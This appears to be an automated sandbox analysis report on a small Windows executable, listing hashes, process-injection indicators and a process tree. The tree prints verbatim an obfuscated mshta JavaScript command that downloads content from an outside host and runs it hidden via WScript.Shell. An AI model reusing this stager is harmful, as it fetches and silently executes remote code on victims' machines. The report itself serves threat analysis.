3e458be66bcf00d7be180728e6b4abda715cadd1788dbcdbeda322d64b47e999

Analysis

Target

eufive_20210727-123655(1).exe
Size

3KB
MD5

8705b09520e5b460cdee9b5e9fbba0a0
SHA1

28a6a1ecdd518b457fcfd9cd492c44b91f299cdd
SHA256

2c6a67dfddb50c345b9b168994067d82d126315930c84d00b549dc6a8e8aa711
SHA512

0d77222abf2099fd20847e138d206c609fa383fe6dc7dc1c419017de55dcf1da88df84f91fce5b34ffd4a756c1820b653400fbf6139d389ff63f6aa79dc8c7ac

Score

1^/10

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 1592	1304	eufive_20210727-123655(1).exe	26
PID 1304 wrote to memory of 1592	1304	eufive_20210727-123655(1).exe	26
PID 1304 wrote to memory of 1592	1304	eufive_20210727-123655(1).exe	26
PID 1304 wrote to memory of 1592	1304	eufive_20210727-123655(1).exe	26

C:\Users\Admin\AppData\Local\Temp\eufive_20210727-123655(1).exe
"C:\Users\Admin\AppData\Local\Temp\eufive_20210727-123655(1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\SysWOW64\mshta.exe
  mshta "javascript:document.write();74;y=unescape('%338%7Eh%74t%70%3A%2F%2F%61s%750%34%2E%73h%6Fp%2Fh%72i%2F%3F%32f%652%652%62%7E%375').split('~');157;try{x='WinHttp';121;x=new ActiveXObject(x+'.'+x+'Request.5.1');130;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);96;x.send();120;y='ipt.S';124;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);148;}catch(e){};89;;window.close();"
  2⤵
  PID:1592

memory/1592-61-0x0000000075551000-0x0000000075553000-memory.dmp

Filesize
8KB

Download